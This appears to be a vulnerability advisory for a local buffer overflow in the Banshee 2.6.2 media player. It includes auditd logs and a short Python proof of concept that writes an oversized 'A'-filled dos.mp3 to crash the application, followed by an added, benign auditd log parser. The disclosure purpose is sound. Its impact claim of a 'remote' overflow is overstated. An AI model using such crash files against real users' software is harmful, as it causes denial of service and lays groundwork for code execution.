
172 lines
No EOL
4.7 KiB
Python
Executable file
'''
Title:
====
Banshee 2.6.2 Local Buffer Overflow Vulnerability

Credit:
======
Name: Ilca Lucian
Contact: lucianfilca@gmail.com
         lucian@pwnthecode.org

CVE:
=====
Unknown (for the moment)

Product:
=======
Play your music and videos. Keep up with your podcasts and Internet radio.
Discover new music and podcasts. Keep your portable device loaded with good
stuff.

Simple enough to enjoy. Powerful enough to thrill. Open source through and
through.

Product link: http://www.banshee.fm

Abstract:
=======
Lucian I. discovered a Local Buffer Overflow vulnerability in Banshee
Player 2.6.2.

Affected Version:
=============
Ver 2.6.2

Date:
============
19.06.2016

Exploitation-Technique:
===================
Local

Severity Rating:
===================
4.4

Details:
=======
Vulnerability Description: Banshee Media Player is vulnerable to a buffer
overflow. The software performs operations on a memory buffer, but it can
read from or write to a memory location that is outside of the intended
boundary of the buffer. Certain languages allow direct addressing of memory
locations and do not automatically ensure that these locations are valid for
the memory buffer that is being referenced. This can cause read or write
operations to be performed on memory locations that may be associated with
other variables, data structures, or internal program data.

Impact: Banshee 2.6.2 is prone to a local buffer-overflow vulnerability
because the application fails to perform adequate boundary checks on
user-supplied input. Specifically, this issue occurs when opening a '.mp3'
playlist file that contains excessive data.

Attackers may leverage this issue to execute a remote buffer overflow or
inject arbitrary code in the context of the application. Failed attacks
will cause denial-of-service conditions.

Path Log:

type=PATH msg=audit(1466452858.351:14): item=0 name="/usr/bin/banshee" inode=17568145 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL
type=PROCTITLE msg=audit(1466452858.351:14): proctitle=64656275676673002F7573722F62696E2F62616E73686565
type=SYSCALL msg=audit(1466452858.351:15): arch=c000003e syscall=2 success=yes exit=3 a0=7fffd6ed664f a1=80000 a2=ffffffff a3=ca items=1 ppid=16021 pid=9458 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts0 ses=4294967295 comm="debugfs" exe="/sbin/debugfs" key=(null)
type=CWD msg=audit(1466452858.351:15): cwd="/root/Downloads"
type=PATH msg=audit(1466452858.351:15): item=0 name="/usr/bin/banshee" inode=17568145 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL
type=PROCTITLE msg=audit(1466452858.351:15): proctitle=64656275676673002F7573722F62696E2F62616E73686565
type=SYSCALL msg=audit(1466453064.143:16): arch=c000003e syscall=59 success=yes exit=0 a0=126cb9f4 a1=adb4f30 a2=12b5d0c0 a3=593 items=3 ppid=1 pid=9559 auid=0 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=tty2 ses=1 comm="banshee" exe="/usr/bin/env" key=(null)
type=EXECVE msg=audit(1466453064.143:16): argc=5 a0="/usr/bin/env" a1="bash" a2="/usr/bin/banshee" a3="--redirect-log" a4="--play-enqueued"
type=CWD msg=audit(1466453064.143:16): cwd="/root"
type=PATH msg=audit(1466453064.143:16): item=0 name="/usr/bin/banshee" inode=17568145 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL
type=PATH msg=audit(1466453064.143:16): item=1 name="/usr/bin/env" inode=17567018 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL
type=PATH msg=audit(1466453064.143:16): item=2 name="/lib64/ld-linux-x86-64.so.2" inode=9047695 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL
type=PROCTITLE msg=audit(1466453064.143:16): proctitle=2F7573722F62696E2F656E760062617368002F7573722F62696E2F62616E73686565002D2D72656469726563742D6C6F67002D2D706C61792D656E717565756564
type=SYSCALL msg=audit(1466453064.159:17): arch=c000003e syscall=2 success=yes exit=3 a0=16b4268 a1=0 a2=0 a3=8 items=1 ppid=1 pid=9559 auid=0 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=tty2 ses=1 comm="bash" exe="/bin/bash" key=(null)
type=CWD msg=audit(1466453064.159:17): cwd="/root"

Error report image link:

https://postimg.org/image/x0x8raw2v/

Prerequisites:
======================
The attacker needs to entice victims to perform an action in order to
exploit this vulnerability.

Proof Of Concept:
================

POC Exploit code:
'''

#!/usr/bin/python
# Writes 7550 'A' bytes to dos.mp3; opening that file in Banshee 2.6.2
# triggers the crash described above.

A = "\x41"        # 0x41 is the byte 'A'
p0c = A * 7550    # oversized payload

generate = "dos.mp3"
with open(generate, "w") as f:   # 'with' closes the file; avoids shadowing the builtin 'file'
    f.write(p0c)

'''
Risk:
=====
The security risk of the Local Buffer Overflow Vulnerability is estimated
as moderate.

Credits:
=======
Lucian Ilca
'''
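The "Path Log" section of the advisory is raw Linux auditd output. As an added example (not part of the original advisory), the following parser splits such records into fields, groups them by event serial, and decodes the hex-encoded proctitle so it can be checked against the argv recorded in the EXECVE record; the sample records are constructed from the page's own log lines.

```python
import re
# Constructed sample in the shape of the advisory's "Path Log": the three
# records of one audit event (serial 16), field values copied from the page.
SAMPLE_AUDIT = """\
type=SYSCALL msg=audit(1466453064.143:16): arch=c000003e syscall=59 success=yes exit=0 a0=126cb9f4 a1=adb4f30 a2=12b5d0c0 a3=593 items=3 ppid=1 pid=9559 auid=0 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=tty2 ses=1 comm="banshee" exe="/usr/bin/env" key=(null)
type=EXECVE msg=audit(1466453064.143:16): argc=5 a0="/usr/bin/env" a1="bash" a2="/usr/bin/banshee" a3="--redirect-log" a4="--play-enqueued"
type=PROCTITLE msg=audit(1466453064.143:16): proctitle=2F7573722F62696E2F656E760062617368002F7573722F62696E2F62616E73686565002D2D72656469726563742D6C6F67002D2D706C61792D656E717565756564
"""

FIELD_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')          # key=value, quoted or bare
MSG_RE = re.compile(r'msg=audit\((\d+\.\d+):(\d+)\)')  # timestamp:serial header

def parse_record(line):
    """One auditd line -> dict. The msg=audit(...) header becomes 'timestamp'
    (float seconds) and 'serial' (int); all records of one event share both."""
    rec = {}
    m = MSG_RE.search(line)
    if m:
        rec["timestamp"], rec["serial"] = float(m.group(1)), int(m.group(2))
    for key, value in FIELD_RE.findall(line):
        if key != "msg":
            rec[key] = value.strip('"')
    return rec

def decode_proctitle(hexstr):
    """auditd hex-encodes proctitle because argv is NUL-separated; decode the
    hex and split on NUL to get the argument vector the kernel saw."""
    return bytes.fromhex(hexstr).decode("utf-8", errors="replace").split("\x00")

def execve_argv(rec):
    """Rebuild argv from an EXECVE record's a0 .. a(argc-1) fields."""
    return [rec["a%d" % i] for i in range(int(rec["argc"]))]

def group_events(text):
    """serial -> list of records (an event spans lines; PATH repeats per item=N)."""
    events = {}
    for line in text.splitlines():
        rec = parse_record(line)
        if "serial" in rec:
            events.setdefault(rec["serial"], []).append(rec)
    return events

def first_of_type(records, rtype):
    return next(r for r in records if r["type"] == rtype)

def proctitle_matches_execve(records):
    """Consistency check: the PROCTITLE argv must equal the EXECVE argv."""
    title = decode_proctitle(first_of_type(records, "PROCTITLE")["proctitle"])
    return title == execve_argv(first_of_type(records, "EXECVE"))
```

The same decoder applied to the shorter proctitle in the log (`64656275676673002F7573722F62696E2F62616E73686565`) yields `debugfs` followed by `/usr/bin/banshee`, i.e. the binary being inspected with debugfs before the crash run.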